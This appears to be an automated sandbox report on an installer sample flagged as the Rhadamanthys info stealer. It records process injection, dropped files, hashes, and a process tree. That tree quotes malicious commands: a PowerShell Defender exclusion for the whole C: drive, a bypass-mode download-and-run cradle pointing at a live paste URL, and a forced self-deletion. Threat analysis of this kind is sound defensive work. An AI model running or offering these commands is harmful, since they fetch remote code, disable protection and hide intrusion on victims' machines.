Analysis
-
max time kernel
123s -
max time network
141s -
platform
windows10-1703_x64 -
resource
win10-20240611-en -
resource tags
arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system -
submitted
05-08-2024 12:01
Static task
static1
Behavioral task
behavioral1
Sample
Install_x64.exe
Resource
win10-20240611-en
General
-
Target
Install_x64.exe
-
Size
152.8MB
-
MD5
718ba2fec3b4922334113b245db63040
-
SHA1
eb4dbf4c59d14a0e1f9e37f980367c6c0b699548
-
SHA256
ba64b40b16dc76d830446f87a7f9e2847ba3d921eec7c3226336af8739b59d2c
-
SHA512
4afd2102fc58dfbd1ec6854bf93700dbfa42c1636609bbbbdef0e71055d970159192ceab1fa7ad1636b6c1b0ba75bc97910199ca2a0900d25fd074b4f7802909
-
SSDEEP
786432:wt2OSpkMhfqpHCOdRIeoxOTx9ylnEk2Fd7yLie63pk3lLwmYEDQ:wtApkMMi5w9qEn7S6S3zY5
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
BitLockerToGo.exeBitLockerToGo.exedescription pid Process procid_target PID 2252 created 2484 2252 BitLockerToGo.exe 43 PID 328 created 2484 328 BitLockerToGo.exe 43 -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 11 3000 powershell.exe 14 3000 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid Process 1360 powershell.exe 3000 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
1.exe1.exe3.exepid Process 4248 1.exe 2096 1.exe 5028 3.exe -
Loads dropped DLL 3 IoCs
Processes:
Install_x64.exepid Process 2996 Install_x64.exe 2996 Install_x64.exe 2996 Install_x64.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 13 ip-api.com -
Suspicious use of SetThreadContext 3 IoCs
Processes:
1.exe1.exe3.exedescription pid Process procid_target PID 4248 set thread context of 2252 4248 1.exe 76 PID 2096 set thread context of 328 2096 1.exe 82 PID 5028 set thread context of 4188 5028 3.exe 87 -
Drops file in Program Files directory 3 IoCs
Processes:
Install_x64.exedescription ioc Process File created C:\Program Files\launcher289\1.exe Install_x64.exe File created C:\Program Files\launcher289\2.exe Install_x64.exe File created C:\Program Files\launcher289\3.exe Install_x64.exe -
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 4268 2252 WerFault.exe 76 5112 2252 WerFault.exe 76 1708 328 WerFault.exe 82 4484 328 WerFault.exe 82 -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
BitLockerToGo.exeopenwith.exeBitLockerToGo.exeopenwith.exeBitLockerToGo.exepowershell.execmd.exewhoami.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language openwith.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language openwith.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language whoami.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exeBitLockerToGo.exeopenwith.exeBitLockerToGo.exeopenwith.exepowershell.exepid Process 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 2252 BitLockerToGo.exe 2252 BitLockerToGo.exe 4572 openwith.exe 4572 openwith.exe 4572 openwith.exe 4572 openwith.exe 328 BitLockerToGo.exe 328 BitLockerToGo.exe 4624 openwith.exe 4624 openwith.exe 4624 openwith.exe 4624 openwith.exe 3000 powershell.exe 3000 powershell.exe 3000 powershell.exe -
Suspicious use of AdjustPrivilegeToken 50 IoCs
Processes:
Install_x64.exepowershell.exepowershell.exewhoami.exedescription pid Process Token: SeDebugPrivilege 2996 Install_x64.exe Token: SeDebugPrivilege 1360 powershell.exe Token: SeIncreaseQuotaPrivilege 1360 powershell.exe Token: SeSecurityPrivilege 1360 powershell.exe Token: SeTakeOwnershipPrivilege 1360 powershell.exe Token: SeLoadDriverPrivilege 1360 powershell.exe Token: SeSystemProfilePrivilege 1360 powershell.exe Token: SeSystemtimePrivilege 1360 powershell.exe Token: SeProfSingleProcessPrivilege 1360 powershell.exe Token: SeIncBasePriorityPrivilege 1360 powershell.exe Token: SeCreatePagefilePrivilege 1360 powershell.exe Token: SeBackupPrivilege 1360 powershell.exe Token: SeRestorePrivilege 1360 powershell.exe Token: SeShutdownPrivilege 1360 powershell.exe Token: SeDebugPrivilege 1360 powershell.exe Token: SeSystemEnvironmentPrivilege 1360 powershell.exe Token: SeRemoteShutdownPrivilege 1360 powershell.exe Token: SeUndockPrivilege 1360 powershell.exe Token: SeManageVolumePrivilege 1360 powershell.exe Token: 33 1360 powershell.exe Token: 34 1360 powershell.exe Token: 35 1360 powershell.exe Token: 36 1360 powershell.exe Token: SeDebugPrivilege 3000 powershell.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe Token: SeDebugPrivilege 2920 whoami.exe -
Suspicious use of WriteProcessMemory 42 IoCs
Processes:
Install_x64.exe1.exeBitLockerToGo.exe1.exeBitLockerToGo.exe3.exeBitLockerToGo.exepowershell.exedescription pid Process procid_target PID 2996 wrote to memory of 1360 2996 Install_x64.exe 71 PID 2996 wrote to memory of 1360 2996 Install_x64.exe 71 PID 2996 wrote to memory of 4248 2996 Install_x64.exe 75 PID 2996 wrote to memory of 4248 2996 Install_x64.exe 75 PID 4248 wrote to memory of 2252 4248 1.exe 76 PID 4248 wrote to memory of 2252 4248 1.exe 76 PID 4248 wrote to memory of 2252 4248 1.exe 76 PID 4248 wrote to memory of 2252 4248 1.exe 76 PID 4248 wrote to memory of 2252 4248 1.exe 76 PID 2252 wrote to memory of 4572 2252 BitLockerToGo.exe 77 PID 2252 wrote to memory of 4572 2252 BitLockerToGo.exe 77 PID 2252 wrote to memory of 4572 2252 BitLockerToGo.exe 77 PID 2252 wrote to memory of 4572 2252 BitLockerToGo.exe 77 PID 2252 wrote to memory of 4572 2252 BitLockerToGo.exe 77 PID 2996 wrote to memory of 2096 2996 Install_x64.exe 81 PID 2996 wrote to memory of 2096 2996 Install_x64.exe 81 PID 2096 wrote to memory of 328 2096 1.exe 82 PID 2096 wrote to memory of 328 2096 1.exe 82 PID 2096 wrote to memory of 328 2096 1.exe 82 PID 2096 wrote to memory of 328 2096 1.exe 82 PID 2096 wrote to memory of 328 2096 1.exe 82 PID 328 wrote to memory of 4624 328 BitLockerToGo.exe 83 PID 328 wrote to memory of 4624 328 BitLockerToGo.exe 83 PID 328 wrote to memory of 4624 328 BitLockerToGo.exe 83 PID 328 wrote to memory of 4624 328 BitLockerToGo.exe 83 PID 328 wrote to memory of 4624 328 BitLockerToGo.exe 83 PID 2996 wrote to memory of 5028 2996 Install_x64.exe 86 PID 2996 wrote to memory of 5028 2996 Install_x64.exe 86 PID 5028 wrote to memory of 4188 5028 3.exe 87 PID 5028 wrote to memory of 4188 5028 3.exe 87 PID 5028 wrote to memory of 4188 5028 3.exe 87 PID 5028 wrote to memory of 4188 5028 3.exe 87 PID 5028 wrote to memory of 4188 5028 3.exe 87 PID 4188 wrote to memory of 3000 4188 BitLockerToGo.exe 88 PID 4188 wrote to memory of 3000 4188 BitLockerToGo.exe 88 PID 4188 wrote to memory of 3000 4188 BitLockerToGo.exe 88 PID 4188 wrote to memory of 3676 4188 BitLockerToGo.exe 90 PID 4188 wrote to memory of 3676 4188 BitLockerToGo.exe 90 PID 4188 wrote to memory of 3676 4188 BitLockerToGo.exe 90 PID 3000 wrote to memory of 2920 3000 powershell.exe 92 PID 3000 wrote to memory of 2920 3000 powershell.exe 92 PID 3000 wrote to memory of 2920 3000 powershell.exe 92
Processes
-
c:\windows\system32\sihost.exesihost.exe1⤵PID:2484
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4572
-
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4624
-
-
C:\Users\Admin\AppData\Local\Temp\Install_x64.exe"C:\Users\Admin\AppData\Local\Temp\Install_x64.exe"1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1360
-
-
C:\Program Files\launcher289\1.exe"C:\Program Files\launcher289\1.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2252 -s 5204⤵
- Program crash
PID:4268
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2252 -s 5004⤵
- Program crash
PID:5112
-
-
-
-
C:\Program Files\launcher289\1.exe"C:\Program Files\launcher289\1.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:328 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 328 -s 5204⤵
- Program crash
PID:1708
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 328 -s 5004⤵
- Program crash
PID:4484
-
-
-
-
C:\Program Files\launcher289\3.exe"C:\Program Files\launcher289\3.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4188 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://pst.innomi.net/paste/42zzhcyga7s4bd9fnjp33ojb/raw" ) ) )4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups /fo csv5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:3676
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
13.5MB
MD52d49f4f1c9964d0f735c46fc0750561e
SHA169fbd91314fb0543b627df7a3688fcf067111846
SHA25695e31ee2a74f11c0705e9eec34cd2707986f5c962eb751cfd3abdcb6b98cf19d
SHA512f4230ac53e6a23a330ab2cb2189504c50f10597c50fead263d6d48eb2c671ea2d5c18b19c0dca99f39e9915258da3f4ac174a6a739f8f16eac786c4480494327
-
Filesize
14.0MB
MD55b3abc719061712a7b6ff9c85ab96b1d
SHA1369d0fb981bcc6fee551da86ff5b0fe17952ded5
SHA256b6dee93840a9b85ebc689343eb45e9ce64559dff65bff34a163a617a82f76070
SHA51261ab170170bfc593275051801c7eee2653379feb3658880476e53b7da94029c9abf82a5fffc8dd8ae3473f7708369f33bac4f95b03e1b04ee4ba0969fc01384b
-
Filesize
1KB
MD50e10c2a380dc8143a37c1207c6a70e0d
SHA11e19db1b0505b3995c23d99ddadebe34b2a08899
SHA256aa7b58c6beae55d21403061d9673b82761e64c430382fcffa14985532e528f1e
SHA51238f9755ba4d077c55f2eaa8a688d71ad5af77fa99d5feaf3fdadf64caf4fbbf183ba73047feaeb5c47f7d4a32a8d1ff057fe36419327709199f29ab6e2f235ef
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
\Users\Admin\AppData\Local\Temp\.net\Install_x64\bdV2J3S7PJgwNF+38gf_Z10mFDLNp2Y=\D3DCompiler_47_cor3.dll
Filesize4.7MB
MD5a7349236212b0e5cec2978f2cfa49a1a
SHA15abb08949162fd1985b89ffad40aaf5fc769017e
SHA256a05d04a270f68c8c6d6ea2d23bebf8cd1d5453b26b5442fa54965f90f1c62082
SHA512c7ff4f9146fefedc199360aa04236294349c881b3865ebc58c5646ad6b3f83fca309de1173f5ebf823a14ba65e5ada77b46f20286d1ea62c37e17adbc9a82d02
-
\Users\Admin\AppData\Local\Temp\.net\Install_x64\bdV2J3S7PJgwNF+38gf_Z10mFDLNp2Y=\PresentationNative_cor3.dll
Filesize1.2MB
MD5e67dff697095b778ab6b76229c005811
SHA188a54a3e3ff2bf83a76bbf5df8a0e50bdb36bcdc
SHA256e92b997f6f3a10b43d3fdc7743307228aa3b0a43430af60ccb06efa154d37e6a
SHA5126f2a2bbbfa0464537fccb53d40239a294dca8fd477e79d70cd9f74079da48525a300675d3b0daae292432adbb9dd099fd4dc95b6fe2794f4c5f3a7e56e15ef51
-
\Users\Admin\AppData\Local\Temp\.net\Install_x64\bdV2J3S7PJgwNF+38gf_Z10mFDLNp2Y=\vcruntime140_cor3.dll
Filesize116KB
MD5d6ac34c46569efe379b58f9b7bbcb6fc
SHA1f9f67352566bb5f98a7336248d8543d9ab4da041
SHA256cff0ced8b2193adff2c06119f70a037b6b79b6fc6c4a19664d4e42bc1c06a9f6
SHA51209a0e43293d39bd465e87e481bf98b1f696eb633d4f49038553e77a9ecd654318db114ee3f0ed85d05b09d1712835b18aa968fd5b304142c3979e1433b770513
-
Filesize
1.9MB
MD524ea1814e6701927b9c714e0a4c3c185
SHA195c27a6b1f5927e3021cb6f9d5ef5998b2c4560a
SHA256d2ebedc0004d5e336c6092e417c11c051767c7dcbcb80303f3484fd805e084ae
SHA512d6c2f32818970d989c834babeac1ce845e832b853ce1c0b3f7ecbfd41331b7d519461bcc0ef07fd35382f263b9e26ac47bb22f0370071913900fc40e3e2656f2